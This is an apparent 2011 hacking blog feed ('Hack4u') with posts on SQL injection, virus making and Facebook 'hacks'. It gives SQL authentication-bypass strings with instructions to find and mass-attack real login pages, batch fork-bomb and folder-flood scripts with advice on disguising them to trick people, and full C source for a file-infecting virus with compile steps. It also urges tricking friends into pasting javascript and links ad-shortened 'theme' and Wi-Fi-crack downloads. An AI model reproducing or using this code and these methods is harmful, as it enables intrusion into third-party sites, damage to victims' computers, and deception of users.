tag:blogger.com,1999:blog-91252566435214511432024-02-19T16:22:39.148+01:00Hack4uBienvenue sur notre blog et bonne visite chez nous .
Faire passer le temps avec 'HACK4U'Hack4uhttp://www.blogger.com/profile/11733247027643250159noreply@blogger.comBlogger25125tag:blogger.com,1999:blog-9125256643521451143.post-37602813491337767032011-07-20T18:09:00.000+02:002011-07-20T18:09:55.539+02:00Did u like to see the new Thémes for your facebook ????<div class="separator" style="clear: both; text-align: center;">TO download the new facebook themes</div><div class="separator" style="clear: both; text-align: center;">From here </div><div class="separator" style="clear: both; text-align: center;"><a href="http://adf.ly/28ufv">http://adf.ly/28ufv</a></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiT8zX9WD-eKGx5wUPRJmRBt9zhyL7MfNVdYOwrk8S6E4x32A7qqckfwK74JCOb_MWrWbCZSp9HMk3lng4i973sGTS1sD7nOCUfQGfFyo-PYIyGQpqtG-wsvIyNSnYaPsrU0X0tRZDM8qk/s1600/Download.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiT8zX9WD-eKGx5wUPRJmRBt9zhyL7MfNVdYOwrk8S6E4x32A7qqckfwK74JCOb_MWrWbCZSp9HMk3lng4i973sGTS1sD7nOCUfQGfFyo-PYIyGQpqtG-wsvIyNSnYaPsrU0X0tRZDM8qk/s1600/Download.png" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://adf.ly/28ufv">http://adf.ly/28ufv</a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://adf.ly/28ufv">http://adf.ly/28ufv</a> </div><div class="blogger-post-footer">Sponsered by kàspér_hàçk</div>Hack4uhttp://www.blogger.com/profile/11733247027643250159noreply@blogger.com0tag:blogger.com,1999:blog-9125256643521451143.post-27257109352150013072011-07-15T14:52:00.001+02:002011-07-15T14:53:05.928+02:00Wi-Fi crack hack logiciel<div style="text-align: center;">Aircrack-ng inclut tous les outils nécessaire pour récupérer rapidement l’accès à un réseau sans-fil et le temps qu’il prend peut varier suivant le mot de passe et le matériel de l’utilisateur. Dans tous les cas, le processus est relativement rapide.<br />
Aircrack-ng est un programme orienté vers les personnes ayant des connaissances avancées en informatique, mais il offre néanmoins assez d’informations pour faciliter l’apprentissage de nouveaux utilisateurs.</div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjY3JCG1euXQ-nuI2kNVY6FTghOAy5OgHXWCiObCo5Z5oDtWEoYbgfO2xqyY9a16r0ZT6uUwMcUHifrTEGFA79mykKzRJbzfcbSQXdDrJXt5Xj0TLOL6jBSFEXcQBulwhL3mxp2Gy1ep8A/s1600/Download.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjY3JCG1euXQ-nuI2kNVY6FTghOAy5OgHXWCiObCo5Z5oDtWEoYbgfO2xqyY9a16r0ZT6uUwMcUHifrTEGFA79mykKzRJbzfcbSQXdDrJXt5Xj0TLOL6jBSFEXcQBulwhL3mxp2Gy1ep8A/s320/Download.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: large;">http://adf.ly/26LuP</span></td></tr>
</tbody></table><div style="text-align: center;"><br />
</div><div class="blogger-post-footer">Sponsered by kàspér_hàçk</div>Hack4uhttp://www.blogger.com/profile/11733247027643250159noreply@blogger.com1tag:blogger.com,1999:blog-9125256643521451143.post-67575008349157475152011-07-15T00:16:00.000+02:002011-07-15T00:16:31.150+02:00Kaspersky Activation<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjME-f5A74l0l__fzXQhR0vXZQdscjQeWNd7uflHgiZnhZ5_-lPkFRTMynwAd-9teYSFGnJUTbMp4oo4ybRR6CvDQuvZojHn3B7Lrn07_Mefq6LSIFHoDrSnIxE0rF819Kzrwqe-AVz4vw/s1600/vED45568.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="298" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjME-f5A74l0l__fzXQhR0vXZQdscjQeWNd7uflHgiZnhZ5_-lPkFRTMynwAd-9teYSFGnJUTbMp4oo4ybRR6CvDQuvZojHn3B7Lrn07_Mefq6LSIFHoDrSnIxE0rF819Kzrwqe-AVz4vw/s320/vED45568.jpg" width="320" /></a></div><div class="blogger-post-footer">Sponsered by kàspér_hàçk</div>Hack4uhttp://www.blogger.com/profile/11733247027643250159noreply@blogger.com0tag:blogger.com,1999:blog-9125256643521451143.post-34671484851294919072011-07-11T15:12:00.000+02:002011-07-11T15:12:54.496+02:00Faire pirater<div dir="ltr" style="text-align: left;" trbidi="on">Piraté </div><div class="blogger-post-footer">Sponsered by kàspér_hàçk</div>Hack4uhttp://www.blogger.com/profile/11733247027643250159noreply@blogger.com1tag:blogger.com,1999:blog-9125256643521451143.post-31301120229391226112011-07-08T11:12:00.002+02:002011-07-08T11:12:28.494+02:00SQL Injection tutorial to Hack websites | Hacking websitesHello Friends, as you all know in previous hacking classes we have already discussed about SQL Injections method of hacking websites. Some of my website users reported that those articles are little bit difficult to understand for new users who wish to learn hacking. For the sake of new users who wish to learn website hacking and SQL injection, i am writing this article at such a basic level that the user who didn't even have any prior knowledge of SQL can start SQL Injecting websites. This article is also beneficial for hackers too as it will refresh their concepts that what really we have to do and look into website URL if we want to hack website or its database using SQL injection. So Guys read on very basic SQL injection tutorial...<br />
<br />
What is SQL Injection?<br />
Basically SQL Injections or simply called Structured Query Language Injection is a technique that exploits the loop hole in the database layer of the application. This happens when user mistakenly or purposely(hackers) enters the special escape characters into the username password authentication form or in URL of the website. Its basically the coding standard loop hole. Most website owners doesn't have proper knowledge of secure coding standards and that results into the vulnerable websites. For better understanding, suppose you opened a website and went to his Sign in or log in page. Now in username field you have entered something say LOKESH and in the password box you pass some escape characters like ',",1=1, etc... Now if the website owner hasn't handled null character strings or escape characters then user will surely get something else that owner never want their users to view.. This is basically called Blind SQL.<br />
<br />
Requirements for SQL Injection:<br />
1. You need a web browser to open URL and viewing source codes.<br />
2. Need a good editor like Notepad ++ to view the source codes in colored format so that you can easily distinguish between the things.<br />
3. And very basic knowledge of some SQL queries like SELECT, INSERT, UPDATE, DELETE etc..<br />
<br />
What you should look into website to detect is it vulnerable to SQL injection attack or not?<br />
First of all you can hack those websites using SQL injection hacks that allows some input fields from which can provide input to website like log in page, search page, feedback page etc. Nowadays, HTML pages use POST command to send parameters to another ASP/ASPX page. Therefore, you may not see the parameters in the URL. However, you can check the source code of the HTML, and look for "FORM" tag in the HTML code. You may find something like this in some HTML codes:<br />
<br />
< F O R M action=login. aspx method=post><br />
< i n p u t type=hidden name=user v a l u e=xyz><br />
< / F O R M><br />
Everything between the < f o r m > and < / f o r m > parameters (remove spaces in words) contains the crucial information and can help us to determine things in more detailed way.<br />
<br />
<br />
There is alternate method for finding vulnerable website, the websites which have extension ASP, ASPX, JSP, CGI or PHP try to look for the URL's in which parameters are passed. Example is shown below:<br />
<a href="http://example.com/login.asp?id=10" target="_blank">http://example.com/login.asp?id=10</a><br />
<br />
Now how to detect that this URL is vulnerable or not:<br />
Start with single quote trick, take sample parameter as hi'or1=1--. Now in the above URL id is the parameter and 10 is its value. So when we pass hi'or1=1-- as parameter the URL will look like this:<br />
<a href="http://example.com/login.asp?id=hi%27" target="_blank">http://example.com/login.asp?id=hi'</a> or 1=1--<br />
<br />
You can also do this with hidden field, for that you need to save the webpage and had to made changes to URL and parameters field and modify it accordingly. For example:<br />
<br />
< F O R M action=http://example.com/login. asp method=p o s t ><br />
< i n p u t type=hidden name=abc value="hi' or 1=1--"><br />
< / F O R M ><br />
<br />
<br />
If your luck is favoring you, you will get the login into the website without any username or password.<br />
<br />
<br />
But why ' or 1=1-- ?<br />
Take an asp page that will link you to another page with the following URL:<br />
<br />
<a href="http://example.com/search.asp?category=sports" target="_blank">http://example.com/search.asp?category=sports</a><br />
In this URL 'category' is the variable name and 'sports' is it's value.<br />
<br />
Here this request fires following query on the database in background.<br />
SELECT * FROM TABLE-NAME WHERE category='sports'<br />
Where 'TABLE-NAME' is the name of table which is already present in some database.<br />
So, this query returns all the possible entries from table 'search' which comes under the category 'sports'.<br />
<br />
Now, assume that we change the URL into something like this:<br />
<a href="http://example.com/search.asp?category=sports%27" target="_blank">http://example.com/search.asp?category=sports'</a> or 1=1--<br />
<br />
Now, our variable 'category' equals to "sports' or 1=1-- ", which fires SQL query on database something like:<br />
SELECT * FROM search WHERE category='sports' or 1=1--'<br />
<br />
The query should now select everything from the 'search' table regardless if category is equal to 'sports' or not. <br />
A double dash "--" tell MS SQL server to ignore the rest of the query, which will get rid of the last hanging single quote ('). <br />
Sometimes, it may be possible to replace double dash with single hash "#".<br />
<br />
However, if it is not an SQL server, or you simply cannot ignore the rest of the query, you also may try<br />
<br />
' or 'a'='a<br />
<br />
It should return the same result.<br />
Depending on the actual SQL query, you may have to try some of these possibilities:<br />
<br />
' or 1=1--<br />
" or 1=1--<br />
or 1=1--<br />
' or 'a'='a<br />
" or "a"="a<br />
') or ('a'='a<br />
'or''='<br />
<br />
How to protect you own websites from SQL injection?<br />
<br />
Filter out character like ' " - / \ ; NULL, etc. in all strings from:<br />
* Input from users<br />
* Parameters from URL<br />
* Values from cookie<br />
That's all for today, I hope it really helped you to clear your basics about website hacking or website database hacking using SQL injection.<br />
If you have any queries ask me in form of comments...<div class="blogger-post-footer">Sponsered by kàspér_hàçk</div>Hack4uhttp://www.blogger.com/profile/11733247027643250159noreply@blogger.com0tag:blogger.com,1999:blog-9125256643521451143.post-27892653908986920342011-07-08T11:10:00.002+02:002011-07-08T11:10:57.700+02:00List of all the SQL Injection Strings<div style="text-align: justify;">One of the major problems with SQL is its poor security issues surrounding is the login and url strings. This tutorial is not going to go into detail on why these string work as all these details have been given in my previous article <a href="http://www.hungry-hackers.com/2008/01/top-10-tricks-to-exploit-sql-server-systems.html" rel="bookmark" title="Permanent Link: Top 10 Tricks to exploit SQL Server Systems">Top 10 Tricks to exploit SQL Server Systems</a> .</div><div style="text-align: justify;">First SEARCH the following Keywords in Google or any Search Engine:</div><div style="text-align: justify;">admin\login.asp<br />
login.asp</div><div style="text-align: justify;">with these two search string you will have plenty of targets to chose from…choose one that is Vulnerable</div><div style="text-align: justify;"><strong>INJECTION STRINGS: How to use it?</strong></div><div style="text-align: justify;">This is the easiest part…very simple</div><div style="text-align: justify;">On the login page just enter something like</div><div style="text-align: justify;">user:admin (you dont even have to put this.)<br />
pass:’ or 1=1–</div><div style="text-align: justify;">or</div><div style="text-align: justify;">user:’ or 1=1–<br />
admin:’ or 1=1–</div><div style="text-align: justify;">Some sites will have just a password so</div><div style="text-align: justify;">password:’ or 1=1–</div><div style="text-align: justify;">In fact I have compiled a <a href="http://www.hungry-hackers.com/2008/09/list-of-all-the-sql-injection-strings.html#combolist" target="_self" title="Combo List">combo list</a> with strings like this to use on my chosen targets . There are plenty of strings in the list below. There are many other strings involving for instance UNION table access via reading the error pages table structure thus an attack with this method will reveal eventually admin U\P paths.</div><div style="text-align: justify;">The one I am interested in are quick access to targets</div><div style="text-align: justify;"><strong>PROGRAM</strong></div><div style="text-align: justify;">i tried several programs to use with these search strings and upto now only Ares has peformed well with quite a bit of success with a combo list formatted this way. Yesteday I loaded 40 eastern targets with 18 positive hits in a few minutes how long would it take to go through 40 sites cutting and pasting each string</div><div style="text-align: justify;"><strong>combo example:</strong></div><div style="text-align: justify;">admin:’ or a=a–<br />
admin:’ or 1=1–</div><div style="text-align: justify;">And so on. You don’t have to be admin and still can do anything you want. The most important part is example:’ or 1=1– this is our basic injection string</div><div style="text-align: justify;">Now the only trudge part is finding targets to exploit. So I tend to search say google for login.asp or whatever</div><div style="text-align: justify;">inurl:login.asp<br />
index of:/admin/login.asp</div><div style="text-align: justify;">like this: index of login.asp</div><div style="text-align: justify;">result:</div><div style="text-align: justify;"><a href="http://www3.google.com/search?hl=en&ie=ISO...G=Google+Search" target="_blank"><span style="text-decoration: underline;"><span style="color: blue;">http://www3.google.com/search?hl=en&ie=ISO…G=Google+Search</span></span></a></div><div style="text-align: justify;">17,000 possible targets trying various searches spews out plent more</div><div style="text-align: justify;">Now using proxy set in my browser I click through interesting targets. Seeing whats what on the site pages if interesting I then cut and paste URL as a possible target. After an hour or so you have a list of sites of potential targets like so</div><div style="text-align: justify;"><a href="http://www.somesite.com/login.asp" target="_blank"><span style="color: blue;"><span style="text-decoration: underline;">http://www.somesite.com/login.asp</span></span></a><br />
<a href="http://www.another.com/admin/login.asp" target="_blank"><span style="text-decoration: underline;"><span style="color: blue;">http://www.another.com/admin/login.asp</span></span></a></div><div style="text-align: justify;">and so on. In a couple of hours you can build up quite a list because I don’t select all results or spider for log in pages. I then save the list fire up Ares and enter</div><div style="text-align: justify;">1) A Proxy list<br />
2) My Target IP list<br />
3) My Combo list<br />
4) Start.</div><div style="text-align: justify;">Now I dont want to go into problems with users using Ares..thing is i know it works for me…</div><div style="text-align: justify;">Sit back and wait. Any target vulnerable will show up in the hits box. Now when it finds a target it will spew all the strings on that site as vulnerable. You have to go through each one on the site by cutting and pasting the string till you find the right one. But the thing is you know you CAN access the site. Really I need a program that will return the hit with a click on url and ignore false outputs. I am still looking for it. This will saves quite a bit of time going to each site and each string to find its not exploitable.</div><div style="text-align: justify;">There you go you should have access to your vulnerable target by now</div><div style="text-align: justify;">Another thing you can use the strings in the urls were user=? edit the url to the = part and paste ‘ or 1=1– so it becomes</div><div style="text-align: justify;">user=’ or 1=1– just as quick as login process</div><div style="text-align: justify;"><a href="" name="combolist"></a><strong>Combo List</strong></div><div style="text-align: justify;"><span style="text-decoration: line-through;">There are lot of other variations of the Injection String which I cannot put on my blog because that is Illegal. If you are interested I can send it to you through Email. Just write in your email address in comment and I will send it to you as early as possible but you need to remain patient it may take 1 or 2 days.</span></div><div style="text-align: justify;">As a result of a lot of requests for the list of SQL Injection String and due to lack of time on our behalf to respond to your Comments we have now decided to give the download link for the list of SQL Injection Strings. Now you just need to Subscribe to our RSS Feed via Email and get the Download link at the bottom of the Confirmation Email. Please don’t Forget to click on the Confirmation Link given in that Email.</div><div style="text-align: justify;">Here is the form to Subscribe to our RSS feed via Email:</div><div class="blogger-post-footer">Sponsered by kàspér_hàçk</div>Hack4uhttp://www.blogger.com/profile/11733247027643250159noreply@blogger.com0tag:blogger.com,1999:blog-9125256643521451143.post-10379228732339013042011-07-08T11:05:00.000+02:002011-07-08T11:05:19.072+02:00How To Make A VirusThis is step by step tutorial that explains how to make a virus. Here you’ll teach how to make simplest virus called fork bomb and how to make a virus that <span class="IL_AD" id="IL_AD8">will make</span> an unlimmited amount of folders in any place you want.<br />
<span id="more-7888"></span><br />
<strong><span style="font-size: medium;">1)How To Make The Simplest Virus – Fork Bomb</span> </strong><br />
Launching fork bomb will lead to total CPU jam by opening about 500 process of <span class="IL_AD" id="IL_AD3">command prompt</span> . CPU usage will be overloaded and <span class="IL_AD" id="IL_AD2">computer</span> will freeze.<br />
1) Launch notepad and type <br />
<blockquote>%0|%0</blockquote><a href="http://hackspc.com/wp-content/uploads/2010/12/fork-1-1.jpg"><img alt="" class="alignnone size-full wp-image-7896" height="337" src="http://hackspc.com/wp-content/uploads/2010/12/fork-1-1.jpg" title="fork 1" width="409" /></a><br />
2) Save as .bat , for example fork.bat<br />
<a href="http://hackspc.com/wp-content/uploads/2010/12/fork-bomb-2-.jpg"><img alt="" class="alignnone size-full wp-image-7891" height="473" src="http://hackspc.com/wp-content/uploads/2010/12/fork-bomb-2-.jpg" title="fork bomb 2" width="590" /></a><br />
3) Launch .bat file that you created in step 2 , once a successful fork bomb has activated in a system, one may have to reboot to resume normal operation. <br />
<a href="http://hackspc.com/wp-content/uploads/2010/12/fork.jpg"><img alt="" class="alignnone size-full wp-image-7898" height="129" src="http://hackspc.com/wp-content/uploads/2010/12/fork.jpg" title="fork" width="105" /></a><br />
<strong><br />
<span style="font-size: medium;">2) How To make A virus That Will Make 1,000 Folders In Few Seconds</span></strong><br />
Here I will teach you simple virus that will make an unlimmited amount of folders in any place you want. <br />
<a href="http://hackspc.com/wp-content/uploads/2010/04/folders-.jpg"><img alt="" class="alignnone size-full wp-image-5059" height="424" src="http://hackspc.com/wp-content/uploads/2010/04/folders-.jpg" title="folders" width="576" /></a><br />
<strong>Step 1 </strong><br />
Open notepad and type : <br />
<code>@echo off<br />
:top<br />
md %random%<br />
goto top </code><br />
@echo off makes it so that it appears to be a blank screen but actually its making hundreds of <span class="IL_AD" id="IL_AD4">folder</span>.<br />
md %random% is command that creating folders with random names.<br />
goto top – return to label :top , infinite loop <br />
<a href="http://hackspc.com/wp-content/uploads/2010/04/1000folders-Notepad.jpg"><img alt="" class="alignnone size-full wp-image-5046" height="241" src="http://hackspc.com/wp-content/uploads/2010/04/1000folders-Notepad.jpg" title="1000folders - Notepad" width="394" /></a><br />
<strong>Step 2 </strong><br />
Save it as 1000folders.bat<br />
<a href="http://hackspc.com/wp-content/uploads/2010/04/Save-As.jpg"><img alt="" class="alignnone size-full wp-image-5047" height="425" src="http://hackspc.com/wp-content/uploads/2010/04/Save-As.jpg" title="Save As" width="565" /></a><br />
After that you will get icon that looks as show below <br />
<a href="http://hackspc.com/wp-content/uploads/2010/04/folders-icon-.jpg"><img alt="" class="alignnone size-full wp-image-5048" height="105" src="http://hackspc.com/wp-content/uploads/2010/04/folders-icon-.jpg" title="folders icon" width="136" /></a><br />
People probably not going to click on an icon that looks like this picture so to make it better (funnier and easier to prank people with) make a short-cut to it<br />
<strong>Step 3 </strong><br />
Right click on icon and click Create <span class="IL_AD" id="IL_AD11">Shortcut</span> <br />
<a href="http://hackspc.com/wp-content/uploads/2010/04/shortcut.jpg"><img alt="" class="alignnone size-full wp-image-5050" height="447" src="http://hackspc.com/wp-content/uploads/2010/04/shortcut.jpg" title="shortcut" width="375" /></a><br />
<strong>Step 4 </strong><br />
Right click on shortcut and click properties , then click on Change Icon and rename icon <br />
<a href="http://hackspc.com/wp-content/uploads/2010/04/shortcut-2.jpg"><img alt="" class="alignnone size-full wp-image-5053" height="179" src="http://hackspc.com/wp-content/uploads/2010/04/shortcut-2.jpg" title="shortcut 2" width="235" /></a><br />
<a href="http://hackspc.com/wp-content/uploads/2010/04/Change-Icon.jpg"><img alt="" class="alignnone size-full wp-image-5054" height="355" src="http://hackspc.com/wp-content/uploads/2010/04/Change-Icon.jpg" title="Change Icon" width="302" /></a><br />
<a href="http://hackspc.com/wp-content/uploads/2010/04/music.jpg"><img alt="" class="alignnone size-full wp-image-5055" height="86" src="http://hackspc.com/wp-content/uploads/2010/04/music.jpg" title="music" width="78" /></a><br />
tell the person that you found the music they wanted and downloaded it on there computer, that way they will think its a shortcut to the music and they will click on it then they will think its loading so they wont exit right away when they finally realize its not going to load or so many errors have came up they realized<br />
somethings wrong it will be to late) also just something to know its impossible to delete them using cmd you HAVE to find all of them and delete them manually…<br />
<span style="font-size: small;"><br />
</span><div class="blogger-post-footer">Sponsered by kàspér_hàçk</div>Hack4uhttp://www.blogger.com/profile/11733247027643250159noreply@blogger.com0tag:blogger.com,1999:blog-9125256643521451143.post-85920428599444212022011-07-08T11:01:00.000+02:002011-07-08T11:01:00.629+02:00Hack4u: How to Create a Computer Virus?<a href="http://hack4u-hack4u.blogspot.com/2011/07/how-to-create-computer-virus.html">http://adf.ly/22IPC<br /></a><div class="blogger-post-footer">Sponsered by kàspér_hàçk</div>Hack4uhttp://www.blogger.com/profile/11733247027643250159noreply@blogger.com0tag:blogger.com,1999:blog-9125256643521451143.post-17985269116525229162011-07-08T10:56:00.000+02:002011-07-08T10:56:51.246+02:00How to Create a Computer Virus?This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on. Here’s the source code of the virus program.<br />
<br />
<div class="stb-info_box" id="stb-box-4761">#include<stdio.h><br />
#include<io.h><br />
#include<dos.h><br />
#include<dir.h><br />
#include<conio.h><br />
#include<time.h> FILE *virus,*host;<br />
int done,a=0;<br />
unsigned long x;<br />
char buff[2048];<br />
struct ffblk ffblk;<br />
clock_t st,end;<br />
void main()<br />
{<br />
st=clock();<br />
clrscr();<br />
done=findfirst(“*.*”,&ffblk,0);<br />
while(!done)<br />
{<br />
virus=fopen(_argv[0],”rb”);<br />
host=fopen(ffblk.ff_name,”rb+”);<br />
if(host==NULL) goto next;<br />
x=89088;<br />
printf(“Infecting %s\n”,ffblk.ff_name,a);<br />
while(x>2048)<br />
{<br />
fread(buff,2048,1,virus);<br />
fwrite(buff,2048,1,host);<br />
x-=2048;<br />
}<br />
fread(buff,x,1,virus);<br />
fwrite(buff,x,1,host);<br />
a++;<br />
next:<br />
{<br />
fcloseall();<br />
done=findnext(&ffblk);<br />
}<br />
}<br />
printf(“DONE! (Total Files Infected= %d)”,a);<br />
end=clock();<br />
printf(“TIME TAKEN=%f SEC\n”,<br />
(end-st)/CLK_TCK);<br />
getch();<br />
}</div><div> </div><h3>COMPILING METHOD:</h3><div> </div><strong>USING BORLAND TC++ 3.0 (16-BIT):</strong><br />
1. Load the program in the compiler, press Alt-F9 to compile<br />
2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9,THIS WILL INFECT ALL THE FILES IN CUR DIRECTORY INCLUDIN YOUR COMPILER)<br />
3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT’S SIZE)<br />
4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT)<br />
5. Once again follow the STEP 1 & STEP 2.Now the generated EXE File is ready to infect<br />
<div> </div><strong>USING BORLAND C++ 5.5 (32-BIT) :</strong><br />
1. Compile once,note down the generated EXE file length in bytes<br />
2. Change the value of X in source code to this length in bytes<br />
3. Recompile it.The new EXE file is ready to infect<br />
<div> </div><h3>HOW TO TEST:</h3><div> </div>1. Open new empty folder<br />
2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THE NEW FOLDER)<br />
3. Run the virus EXE file there you will see all the files in the current directory get infected.<br />
4. All the infected files will be ready to reinfect<br />
That’s it<br />
<div class="stb-warning_box" id="stb-box-5952"><strong>WARNING: FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD OR MISUSE THIS VIRUS CODE</strong></div><div class="blogger-post-footer">Sponsered by kàspér_hàçk</div>Hack4uhttp://www.blogger.com/profile/11733247027643250159noreply@blogger.com0tag:blogger.com,1999:blog-9125256643521451143.post-52571355931855965382011-07-08T10:53:00.002+02:002011-07-08T10:53:44.534+02:00How to make a virus with ... the Virus Creation WizzardI used to think that making viruses had something to do with programming skills. I thought writing a program that could copy itself, spread itself, hide in other programs or files, find its way around on all these different computers, that surely had to be the summum of programming. <br />
Maybe this once was true. Back in the old days, when viruses ware written in assembler, were small enough to hide in the boot sector of a floppy disk, were able to attach themselves to a file without anyone noticing (and files were quite small those days), had stealth capability, and could influence your hardware directly, bypassing the operating system. <br />
So maybe, maybe in those days, creating viruses could be seen as an achievement, or as a sport. Now, any fool can do it. And judging by the number of viruses, a lot of them do. <br />
Here's how. <br />
<div> <ol><li>search the web for something like "Virus Construction Tool" or "Internet Worm Generator". Download it.</li>
<li>run the program (click on its icon).</li>
<li>fill in the form. Choose interesting names. <br />
<img alt="screenshot1" src="http://users.telenet.be/mydotcom/howto/virus01/v1_scr1.gif" /> </li>
<li>check the boxes to indicate how you want this virus / worm to spread (e-mail, irc, ...) <br />
<img alt="screenshot3" src="http://users.telenet.be/mydotcom/howto/virus01/v1_scr3.gif" /> </li>
<li>choose your options for 'payload' <br />
<img alt="screenshot2" src="http://users.telenet.be/mydotcom/howto/virus01/v1_scr2.gif" /> <br />
click "Done". </li>
<li>click "create virus" or "generate"</li>
<li>Save the file</li>
<li>run it to see if it works. </li>
</ol></div>This should create a <a href="http://users.telenet.be/mydotcom/howto/scripts/vbs01.htm">visual basic script</a> that will run on Windows computers and try to use the same Outlook application files to mass-mail itself. Much like the 'I love you' virus or the 'Ana Kournikova' worm. <br />
Silly. <br />
<img alt="i love you skriptkidddie" src="http://users.telenet.be/mydotcom/howto/virus01/skriptkid.gif" /><div class="blogger-post-footer">Sponsered by kàspér_hàçk</div>Hack4uhttp://www.blogger.com/profile/11733247027643250159noreply@blogger.com0tag:blogger.com,1999:blog-9125256643521451143.post-35393317559501905492011-07-06T12:01:00.000+02:002011-07-06T12:01:05.172+02:00Hacking Facebook with Javascriptnow updated for the latest (March 2010) version of facebook!<br />
<h3><img alt="" class="alignright" height="68" src="http://www.puremango.co.uk/hacking_facebook/fblogo.png" width="210" /></h3>Because facebook relies so heavily on javascript, and because we can type javascript into the address bar, that means we can “poke” into the workings of facebook to do things that we wouldn’t normally be able to do. It’s not “hacking” exactly, but it employs the same sort of skills hackers use when looking into applications. The best part is that because it’s all using the same control codes (or “API”) that facebook uses, there’s no way for facebook to find out you’re doing it, so it’s totally safe! (I think…) Besides, we’re not going to be doing anything <em>too</em> dodgy, just a few little tweaks ;)<br />
<span id="more-257"></span><strong>Facebook Hack: Sending your friends offline</strong><br />
Here’s a funny one; if you’re chatting to a friend, get them to paste the following code into their facebook address bar:<br />
<code>javascript:buddyList.toggleTab();</code><br />
It’ll make them go offline! Of course it’s not permanent, they can go back online by clicking the icon as normal, or by giving the same command again<br />
<strong>Facebook Hack: Change facebook color</strong><br />
Check this out:<br />
<img alt="" height="37" src="http://www.puremango.co.uk/hacking_facebook/color.png" width="377" /><br />
Isn’t that cool? Just use the following code to get your profile colour changed and impress your friends!<br />
<code>javascript:void(document.getElementById('headNavOut').style.backgroundColor="red");</code><br />
Of course, you can use any colour you like; green, yellow,orange, black. It’s also fun to change it to “white” so you can’t see the text. Muahahaha. Again, only you can see it, but it does last until you log out or view certain special pages.<br />
<strong>Facebook Hack: Get Chat History Even When Friends Aren’t Online</strong><br />
New: <a href="http://www.puremango.co.uk/2009/07/facebook-chat-history/">Video Tutorial</a> for this hack.<br />
Here’s a facebook hack that’s actually proven very useful to me in the past. One thing that I find annoying about facebook is that you can’t retrieve chat history if your buddy is offline… well now you can! :)<br />
<div style="text-align: left;">Click onto your friend’s profile page and copy their facebook ID from the address bar; i.e. the number after “id=”, highlighted in red below:</div><img alt="" class="aligncenter" height="98" src="http://www.puremango.co.uk/hacking_facebook/getid.png" width="494" /><br />
<img alt="" class="alignright" height="313" src="http://www.puremango.co.uk/hacking_facebook/_hellome.png" width="233" /><br />
It might look slightly different, perhaps like this: http://www.facebook.com/home.php#/profile.php?id=123132132213&ref=nf<br />
But the important thing is to copy the number of the user, in our case 123132132213<br />
Then <em>while you’re still on facebook</em>, type this into the address bar:<br />
<code>javascript:buddyList.itemOnClick(123132132213);</code><br />
(with the correct ID of course)<br />
And their chat window will pop up, saying “Jimbo is offline”. And if there’s any chat history, it will be displayed. How neat is that!<br />
You can even open a chat window to yourself by pasting your own ID into the javascript, as seen to the right. You can use it for little notes to yourself, but remember that facebook chat history is cleared every few days, so don’t rely on it.<br />
<strong>UPDATE1</strong>: A few people have had trouble pasting it in correctly, so here’s how it should look:<br />
<div style="text-align: center;"><img alt="" class="aligncenter" height="91" src="http://www.puremango.co.uk/hacking_facebook/howto.png" title="Paste the javascript hack into facebooks address bar." width="443" /></div><strong>UPDATE2</strong>: Now that we have <a href="http://www.puremango.co.uk/2009/06/facebook-username-vanity-urls/" target="_self">facebook usernames</a>, it can be little harder to determine the ID of a profile, but it’s still possible – here’s one way: right click the “see all” friends link and choose “copy link location”, like so:<br />
<img alt="" class="aligncenter" height="269" src="http://www.puremango.co.uk/hacking_facebook/viewall.png" title="View All Friends" width="413" />Or in Internet Explorer, you can choose “open link in new tab”. The resulting URL will look something like this:<br />
<blockquote><div style="padding-left: 60px;">http://www.facebook.com/friends/?id=YOUR_ID_HERE&view=everyone</div></blockquote>That’s it!<br />
<strong>Facebook Hack: Change your name (temporarily)</strong><br />
This one’s a very simple hack that you can apply to any website. As you saw in the screenshot above, I’d changed my facebook to display as “Facebook | Leet Hax0r”. You can do this by using the following javascript:<br />
<code>javascript:void(document.title="Facebook | Neo");</code><br />
Sadly, your friends will only see your actual name, not the new one, but it can make for some amusement in a computer lab class or anywhere where you can show people face to face.<br />
<strong>Facebook Hack: Close chat windows</strong><br />
If you’re chatting to a friend and want to close the window, sure you can just click the ‘x’ in the top corner, but isn’t it cooler to do it with javascript? Well no not really, but if you can trick your friend into typing the following code in, you can close the chat window of anyone they’re chatting to:<br />
<code>javascript:chatDisplay.tabs[123132132213].tabXOnClick();</code><br />
That will close my chat with “123132132213″. You can send your friends that link with your own facebook ID in it, and it’ll close their chat window with you! And if you happen to know that ID:123 is chatting with ID:321, you can send the following to ID:123, and when they paste it in it’ll close their chat with 321!<br />
<code>javascript:chatDisplay.tabs[321].tabXOnClick();</code><br />
<strong>Other Facebook Hacks</strong><br />
The hacks above are the most impressive, but there are a few other little things you can do which are mildly interesting:<br />
Bring up notifications:<br />
<code>javascript:presence.toggleTab('chat_status_control','chat_status_control_tab');</code><br />
Bring up online friends list:<br />
<code>javascript:buddyList.toggleTab();</code><br />
Bring up application tab:<br />
<code>javascript:applicationDock.toggleTab();</code><br />
